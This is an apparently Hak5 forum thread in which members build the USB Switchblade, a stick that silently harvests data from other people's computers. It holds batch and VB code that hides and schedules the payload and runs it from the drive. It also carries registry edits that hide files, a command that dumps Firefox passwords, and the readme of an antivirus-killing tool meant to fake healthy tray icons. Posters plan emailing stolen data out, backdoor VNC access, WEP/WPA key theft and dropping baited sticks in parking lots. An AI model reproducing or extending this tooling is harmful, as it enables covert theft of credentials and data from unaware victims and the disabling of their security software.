USB Switchblade Development

[therian16]

srry double post

[Darren Kitchen]

pseudobreed,

I follow your payload so far except this threw me for a loop.

:: Schedule Update

:: Parse Time

for /f "tokens=5-8 delims=:. " %%a in ('echo/^|time') do (

  set hh=%%a

  set mn=%%b

  set ss=%%c

  set ds=%%d

)



:: Add 5 Minutes

set /a mn=mn+5



:: If Min is less than 10, add 0 to front

if %mn% LSS 10 set mn=0%mn%



:: Sched Next Update

at %hh%:%mn% %windir%system32sched.bat



:: Done

Can you explain this part of your batch in more detail? I'm currently working on a hack for the next episode that I'm almost done with, except for a little issue with retreiving "goodies" that the program gathers. It needs to run at a set interval and upload said goodies to a remote location without the user noticing. I'd rather not use the windows task scheduler and any way to supress a command window would be best. If you could clear that up for me or offer any suggestions on my problem that would be a great help. The hack I'm working on has some really big potential if I can just get the data off the owned machine automatically and without notice.

[Darren Kitchen]

Sorry for double post. Just downloaded pseudobreed's payload to analyze. Came in at 8 KB/s. Here are hak5.org mirrors

http://www.hak5.org/releases/2x02/switchbl...uzer_Loader.zip

PS: This is a really elegant payload. It should be added to the wiki.

Edit: Scratch that, I cant seem to download the Payload zip. The download quits after a minute and I only get 10%. Could you mirror somewhere?

[pseudobreed]

Bah, free host are not what they used to be...

Here are links with YouSendIt (File should be available for 7 days)

Cruzer Loader

Cruzer Payload

USB Payload

Lets see if I can explain this.

The for statement in batch is pretty much like this:

for /F ["option"] {%% | %}variable in {'command'} do ()

/F

Tells the for statement to parse a file or command

["option"]

The tokens option says which tokens from each line are to be passed for each loop. So, Im saying grab tokens 5 through 8. If the last character is an * then it keeps making variables until the remaining text on the line is parsed. (ie. tokens=1-* would grab the whole line)

The delims state what to ignore.

{%% | %}variable

This is the replacable variables(s). %% is to be used in batch files. % is to use at the command prompt. They are case-sensitive and you have to give it an alpha value, such as %a, %b, or %c. I started out with a, so it will create variables a, b, c, d, etc...

{'command'}

This is the command or file to parse.

Here is the FOR command in MSDN.

set

Creates a local variable until the batch ends.

/a

Tells the set command that we are using a math expression.

So, I took the mn variable (Minutes) and added 5 to it.

Then I checked to see if it was greater than 10. If it's less than 10, set only creates a single digit number. So, to fix this I just throw a 0 in front so the "at" command will except the variable as double digit minutes.

I hope that explains everything.

The only reason I used the sched is I didnt want to write an application that had a timer in it. I figured an application running all the time in the background is noticable more than a task in the schedular. Not many people actually look at their schedular. The only fall back there is task schedular service has to be running, I found that out earlier. Im going to include that fix along with the NAT-NAT connection in the next version.

Im almost tempted to try and figure out what Hamachi does and setup a silent install that way. It would be really nice to just have a messenger like app with all the computers listed and connected through a VPN. I do know on the install, it creates a network driver, then they do a NAT to NAT using their private servers...

[hantakage]

Set objFSO = CreateObject("Scripting.FileSystemObject")

Set colDrives = objFSO.Drives

For Each objDrive in colDrives

If objFSO.FileExists(objDrive.DriveLetter & ":wipcmdgo.cmd") Then

strPath = objDrive.DriveLetter & ":wipcmd"

strcmd = """" & strPath & "" & "go.cmd" & """"

CreateObject("Wscript.Shell").CurrentDirectory = strPath

CreateObject("Wscript.Shell").Run strcmd, 0, False

End If

Next

Hi pseudobreed, I see one issue with your code. I've been working on various USB attacks over the past few months, originally being interested in hacking iPod firmware to get it to autorun, and had decided to try with U3 devices after I read up on them. The wonderful folks on this forum beat me to it by a couple of weeks though ;( Anyhow - your code will search through each drive on the system looking for the presence of the file "wipcmdgo.cmd" in order to find the drive that the USB Partition is on. This is what I had originally planned to do as well, unfortunately it is not as stealthy as I had hoped. If the user has a CD-ROM or floppy in the machine you code will make a call to the disk to the look for the presence of the file. In both these cases a user would realise something was going on as the Floppy will start making noise / CD-Rom will start spinning.

Theres 2 ways I tried to get around this. Firstly you can check the values in the HKLMSystemMountedDevices key that are in the format "DosDevices[DRIVE LETTER]" and look for the value that corresponds to the USB Drive.

The other way (that I use) is a simple loop written in C++ that starts at D: and wokrds through to Z: (then does A: - C: ) calling GetVolumeInformation on each drive until you find the one whose serial number matches your disk. Or easier again rename your disk to something like " Local Disk" (Note the space) and search the GetVolumeInformation for that. This is great as it does not actually query the disks themselves - just the registry. Then once you have your drive just take the drive letter and ShellExecute your autorun file on the autorun partition.

I'll post up my payload and stuff later on - its similar to what people have already posted with some small differences. The idea I wanted with my payload was that I wanted there to be no traces of the machine ever being touched -so there are no backdoors dropped, firewall setting changed etc.

[pseudobreed]

The above code was from MD's vbscript, however, I used the same method to look for the drive.

I liked your idea so I redid my code and commented it.

I added the GetDriveType API to query the drive to find out what kind of drive it is. This does not spin up the CD-Rom drives. If the type is removable, then look for the file and execute it.

Option Explicit



' API Function to get type of Drive

Private Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String) As Long



Private Sub Form_Load()

  Dim FSO As New FileSystemObject   ' File System Object

  Dim objDrive As Drive             ' Drive Object

  Dim lCurrDrive As Long             ' Current Drive Letter/Number

  Dim lDriveType As Long            ' Current Drive Type

  

  ' Begin loop to check each drive for removable drive

  For Each objDrive In FSO.Drives

    ' Convert current drive letter to ANSI

    lCurrDrive = Asc(objDrive.DriveLetter)

    

    ' Get drive type with API call

    lDriveType = GetDriveType(Chr$(lCurrDrive) & ":")

      ' 0: Unknown

      ' 1: Does Not Exist

      ' 2: Removable Drive

      ' 3: Fixed Drive

      ' 4: Remote Drive

      ' 5: CD-ROM Drive

      ' 6: RAM Drive

    

    ' If drive is removable, then look for the file

    If lDriveType = 2 Then

      If FSO.FileExists(objDrive.DriveLetter & ":autorun.bat") Then

        ' Change directory path for shell call

        ChDrive objDrive.DriveLetter & ":"

        

        ' Exec autorun.bat

        Shell objDrive.DriveLetter & ":autorun.bat"

        

        ' Clean up

        Set objDrive = Nothing

        Set FSO = Nothing

      End If

    End If

  Next

  

  ' Exit

  Unload Me

End Sub

And, the new file can be downloaded here.

[Logue]

I was just thinking, for the non-U3 way, is there any way that you could turn the option of "Hidden files and folders" to Do Not Show?

Because the payload is run right when they click to look at whats on the stick could some command to turn Hidden files and folders to do not show, that way have the folder doing everything to the computer not show up?

[pseudobreed]

I thought about that, and it can be done in the registry.

Do not show System Files

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced] "ShowSuperHidden"=dword:00000000

Do not show Hidden Files

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced] "Hidden"=dword:00000002

Or add this code to autoexec.bat in my payload

:: Hide Hidden and System Files

RECYCLERnircmd.exe regsetval dword "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" "ShowSuperHidden" "0"

RECYCLERnircmd.exe regsetval dword "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" "Hidden" "2"

[PoyBoy]

Anyone else have the problem of the iTunes remote speaker window opening with the Amish method?

[marc]

Yep Poyboy, i get that too on this machine, along with a Mozy Remote window opening up.

How about WEP Keys, or any wireless details? I'm using Amish's version on laptops and it would be great to steal WEP/WPA details for use with my own laptop or nintendo DS linux.

[pseudobreed]

I remember there being a proof of concept of where you could RPC the Wireless Zero Configuration Service and it would drop WEP and WPA in clear text. And, you could do it without being under an admin account.

However, it only worked after the View Available Wireless Networks was opened.

In June, Microsoft issued a patch that actually changes the time it holds this info in the cache.

I didnt hear much about it after that, or even know if the exploit still works.

[therian16]

As no one has brought this up before, in my situation i use me Switchblade alot on the same computers transfering files from one to the other. just to add a little stealthyness I added this line to my go.cmd

if exist Documentslogfiles%computername%.log goto end

This will essentially stop making copies of computers you already have info on. This isn't a necessity but on some older computers I noticed a small lag time while the payload is run. What do you guys think?

[pseudobreed]

Instead of just ending the batch, why not call a goto that will exec applications that have dumps that could have changed (ie Internet History/Passwords, Email Client, Messengers, Keylogs).

I do see what you are saying, no reason to pull off a full payload if you already have most of the info.

I added an update to the payload that downloads a new payload and dumps info that may have changed and emails it out using blat. I personally didnt want to chance plugging the drive in again, especially if it was a physically difficult to get to the computer the first time.

If only I could get a good NAT-NAT connection going, then the backdoor VNC will come handy much more when needing to remotely update the payload. At the moment, Im limited to computers that are on the same network. Like the user who walks away from his computer to get a refill at the local "hot-spot."

Im dropping Hamachi as an option. I started to write an app that grabbed the hwnd of applications so I could delete the system tray icons, however, hamachi adds much more than just an icon, and Im sure if you can hide network adapters or not.

Im going to check out OpenVPN now...

Once I get that going. Im thinking about "loosing" the key in a parking lot and having blat just email once the payload is pulled off. Would be kind of interesting to see where it travels. Unless someone puts it in a machine that has no internet connect, then formats the drive to keep as their own.

[moonlit]

Project on hold, my hat's getting sun-bleached...

URL Removed.

AVKill 1.0 by Moonlit 

===================== 







Description: 

============ 

This tool will kill a selection of antivirus applications. 

The antivirus application will be killed only until the next reboot, no files are modified or destroyed. 







Usage: 

===== 

Run Esc.exe either manually or via a batch or script. The AV killer (AVKill.exe) will be run under System priviledges and kill the AV software. 







Todo: 

===== 

Add tray icons to simulate the appearance of the AV being fully functional. 

One axample would be where AVG might grey out it's tray icon to show something is not working, need to make it show a coloured icon to avoid suspicion. 



Add more antivirus apps to be killed. 



Possibly add firewalls and anti-spyware apps to help avoid detection even further. 



Add options/switches to kill totally (remove AV), use tray icon(s), restart AV when done or after a certain time period.



Merge to 1 exe.





History/Fixes: 

============== 

V1.0: Fixed 100% CPU usage, removed test forms, fixed 'root dir only' bug. 



v0.5: Added AVG, Avast, NOD32 and Trend.







Greetz:

=======

Melodic, Bigbro and Kainchick for testing, #hak5 on irc.hak5.org for help & support.

Duped in Switchblade thread for relevance, here for those who don't read aforementioned thread.

Edit: Updated versions available, see wiki page for info - will be updating wiki page more regularly than here most likely so keep an eye out :)

[boristsr]

nicely done. just ran it in a VM to test a few things. i was expecting SP2 to bring up an "AV Offline" message, but it didn't. the icon stayed in the task bar as long as the mouse didn't move over it (and it's likely that won't happen too often)

[moonlit]

Update to AVKill, please see http://www.hak5.org/wiki/AV_Killer for more info, that's where I'll be updating.

[Snax]

Update to AVKill, please see http://www.hak5.org/wiki/AV_Killer for more info, that's where I'll be updating.

Great job man. I just tied it in with my prog. Now if i can just try in a mcafee killer or something it would be awesome. Most people use that damn thing and it detects the password dump and a few others.

:D

[moonlit]

Yeah I'll be looking in to adding more AVs in future versions, please keep a lookout on teh wiki, it's coming soon :D

[pseudobreed]

The AVKiller almost needs a thread by itself.

I tried it on one of my laptops running AntiVir and it did not kill it.

Im not sure how discreet you are trying to make, however, these are the things that popped up on me.

I use task schedular/at all the time so when I noticed the new task scheduled it caught my eye. This only happens when you use it withouth the switch and Im sure that is to gain system rights. A couple issues there, task schedule service has to be running and you have to have rights to the AT command.

Also, when I run 'avkill -a' from the command line about 4-5 console windows pop up on my start menu.

This laptop is running XP SP2 and AntiVir.

Here is some info on AntiVir that may help

Installed Directory:

C:Program FilesAntiVir PersonalEdition Classic

Main Process:

C:Program FilesAntiVir PersonalEdition Classicavcenter.exe

Modules:

C:Program FilesAntiVir PersonalEdition Classicccmainrc.dll

C:Program FilesAntiVir PersonalEdition Classicccgrdrc.dll

Application Specific:

build.dat - Build Number

avewin32.dll - Search Engine

antivir.vdf - Virus Definitions

avcenter.exe - Control Center

avconfig.exe - Config Center

avscan.exe - Luke Filewalker

avpack32.dll - Archive Library

avguard.exe - AntiVir Guard

avgnflt.sys - Filter

sched.exe - Scheduler

update.exe - Updater

Services:

AntiVirService - AntiVir PersonalEdition Classic Guard

AntiVirScheduler - AntiVir PersonalEdition Classic Scheduler

If there is anything else I can provide that will help let me know.

[moonlit]

Thanks man, that'll help a lot... support for AntiVir isn't enabled yet but thanks for the info... I knew about the AT command being obvious if you watch Task Scheduler but bear in mind in the switchblade environment you probably wouldn't have time to check it while someone's playing with a USB key ;)

Using the -a switch from the command line isn't supported as yet since running without switches enables the -a switch to work it's magic (-a is the switch that makes it do the cool stuff)...

The console windows are from NET STOP commands used for some of the services used by the AVs and I've not seen them cause a problem with anyone's testing yet but I'll look in to it :)

I'll go about adding AntiVir support very soon, thanks again :D

Oh, and as for the thread: http://www.hak5.org/forums/viewtopic.php?t=2713 ;)

[sircrumpet]

hmmm... what moonlit has done is great, but I still feel that encrypting the exes would be an easier way to go about things...

Pseudobreed's version seems to work well (although NOD32 absolutely HATES mailpv.exe), though it does a bit too much for what i want, and as such i've been playing around and editing it a bit...

I'm also extremely curious as to whether anyone has found a program similar to the "IE PassView" that is included with many of these switchblades, but that will get the passwords out of Firefox as well...

[Sloth]

Just to add my little piece to this project, I came across this little gem called firepassword that will get the username/password of everything firefox is told to remember. The only limitation is that the program cannot bypass master passwords. Installation is simple just copy the 3 files to WIPCMD and add this line to your go.cmd.

FirePassword.exe >Documentslogfiles%computername%.txt

I edited my go.cmd so a new folder was created just for this txt file. If anyone needs this more explained I can post the changes I made.

Here's the link for that program

http://nagmatrix.50webs.com/article_firepassword.html

sircrumpet-

found that back on page 17...hope thats what you were looking for.

-Sloth

[therian16]

I love that programs works great!

If you come across a master password for firefox try firemaster from the same site. All you need is a decent dictionary file which I'm gaving a hard time finding a good one, any links someone could mention?

If anyone has the same thing for Opera that is what I'm after next.

[sircrumpet]

...

sircrumpet-

found that back on page 17...hope thats what you were looking for.

-Sloth

Thanks Sloth, must of missed that one - it works great :D

[deoFusion]

I love that programs works great!

If you come across a master password for firefox try firemaster from the same site. All you need is a decent dictionary file which I'm gaving a hard time finding a good one, any links someone could mention?

If anyone has the same thing for Opera that is what I'm after next.

Get the file named theargonlistver2.zip at http://www.theargon.com/achilles/wordlists/theargonlists/ Its 83mb compressed, but after you extract it, it's around 2gb